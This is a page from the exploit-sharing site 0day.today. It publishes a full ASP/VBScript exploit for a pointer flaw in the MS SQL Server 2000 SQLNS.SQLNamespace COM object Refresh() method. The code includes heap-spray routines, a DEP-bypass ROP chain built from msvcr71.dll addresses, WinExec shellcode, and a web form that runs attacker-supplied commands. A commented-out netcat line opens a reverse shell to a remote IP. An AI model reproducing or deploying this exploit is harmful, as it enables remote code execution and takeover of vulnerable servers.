0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit
[<%
Function Padding(intLen)
Dim strRet, intSize
intSize = intLen/2 - 1
For I = 0 To intSize Step 1
strRet = strRet & unescape("%u4141")
Next
Padding = strRet
End Function
Function PackDWORD(strPoint)
strTmp = replace(strPoint, "0x", "")
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 5, 2) & Mid(strTmp, 7, 2))
PackDWORD = PackDWORD & UnEscape("%u" & Mid(strTmp, 1, 2) & Mid(strTmp, 3, 2))
End Function
Function PackList(arrList)
For Each Item In arrList
PackList = PackList & PackDWORD(Item)
Next
End Function
Function PackShellcode(strCode)
intLen = Len(strCode) / 4
If intLen Mod 2 = 1 Then
strCode = strCode & "\x90"
intLen = intLen + 1
End If
arrTmp = Split(strCode, "\x")
For I = 1 To UBound(arrTmp) Step 2
PackShellcode = PackShellcode & UnEscape("%u" & arrTmp(I + 1) & arrTmp(I))
Next
End Function
Function UnicodeToAscii(uStrIn)
intLen = Len(strCommand)
If intLen Mod 2 = 1 Then
For I = 1 To intLen - 1 Step 2
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
Next
UnicodeToAscii = UnicodeToAscii & "%u00" & Hex(Asc(Mid(strCommand, I, 1)))
Else
For I = 1 To intLen - 1 Step 2
UnicodeToAscii = UnicodeToAscii & "%u" & Hex(Asc(Mid(strCommand, I + 1, 1))) & Hex(Asc(Mid(strCommand, I, 1)))
Next
End If
UnicodeToAscii = UnEscape(UnicodeToAscii & "%u0000%u0000")
End Function
'''''''''''''''''''''''''''''bypass DEP with [msvcr71.dll] 92 bytes
Rop_Chain = Array(_
"0x41414141", _
"0x7c373ab6", _
"0x7c3425bc", _
"0x7c376fc5", _
"0x7c343423", _
"0x7c3415a2", _
"0x7c373ab6", _
"0x41414141", _
"0x41414141", _
"0x41414141", _
"0x41414141", _
"0x7c344dbe", _
"0x7c376fc5", _
"0x7c373ab6", _
"0x7c373ab6", _
"0x7c351cc5", _
"0x7c3912a3", _
"0x7c3427e5", _
"0x7c346c0b", _
"0x7c3590be", _
"0x7c37a151", _
"0x7c378c81", _
"0x7c345c30" _
)
Small_Shellcode = "\x64\x8B\x25\x00\x00\x00\x00\xeb\x07\x90\x90\x90"
'0C0C0C6C 64:8B25 00000000 MOV ESP,DWORD PTR FS:[0]
'0C0C0C73 EB 07 JMP SHORT 0C0C0C7C
'0C0C0C75 90 NOP
'0C0C0C76 90 NOP
'0C0C0C77 90 NOP
'12 bytes
Fix_ESP = "\x83\xEC\x24\x8B\xEC\x83\xC5\x30"
'0C0C0C7C 83EC 24 SUB ESP,24
'0C0C0C7F 8BEC MOV EBP,ESP
'0C0C0C81 83C5 30 ADD EBP,30
'8 bytes
'''''''''''''''''''''''''''''shellcode WinExec (win2k sp2)
Real_Shellcode = "\xd9\xee\x9b\xd9\x74\x24\xf4\x5e\x83\xc6\x1a\x33\xc0\x50\x56\x68\x41\x41\x41\x41\x68\x16\x41\x86\x7c\xc3"
'D9EE FLDZ
'9B WAIT
'D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
'5E POP ESI
'83C6 1a ADD ESI,1a
'33C0 XOR EAX,EAX
'50 PUSH EAX
'56 PUSH ESI
'68 F1F8807C PUSH kernel32.ExitThread
'68 1641867C PUSH kernel32.WinExec
'C3 RETN
'''''''''''''''''''''''''''''main
Dim strCmd
strCmd = Request("cmd")
strCommand = "cmd.exe /q /c " & strCmd
'strCommand = "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 192.168.194.1 8080"
strOpcode = PackShellcode(Real_Shellcode) & UnicodeToAscii(strCommand)
intOpcode = Len(strOpcode)
Payload = String((1000/2), UnEscape("%u4141")) & PackDWORD("0x0c0c0c0c") & PackList(Rop_Chain) & PackShellcode(Small_Shellcode) & PackDWORD("0x5a64f0fe") &_
PackShellcode(Fix_ESP) & strOpcode &_
Padding(928 - intOpcode*2)
'Response.Write Len(Payload)
Dim Block
For N = 1 to 512
Block = Block & Payload
Next
Dim spary()
For I = 0 To 200 Step 1
Redim Preserve spary(I)
spary(I) = Block
Next
If strCmd = "" Then
Response.Write "Please Input command! <br />"
Else
Set obj = CreateObject("SQLNS.SQLNamespace")
Response.Write "Try to Execute: " & strCommand
arg1 = 202116108 '0x0c0c0c0c
obj.Refresh arg1
End If
%>
<html><head><title>Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass)</title>
<body>
<p>
Microsoft SQL Server 2000 SP4 SQLNS.SQLNamespace COM object Refresh() Pointer Error Exploit(DEP bypass) <br />
Other version not test :) <br />
Bug found and Exploit by ylbhz@hotmail.com At 2012/04/03<br />
</P>
<form action="" method="post">
Program to Execute:<input type="text" value="<%=strCmd%>"size=120 name="cmd"></input><input type="submit" value="Exploit">
</form>
</form>
# 0day.today [2024-10-06] #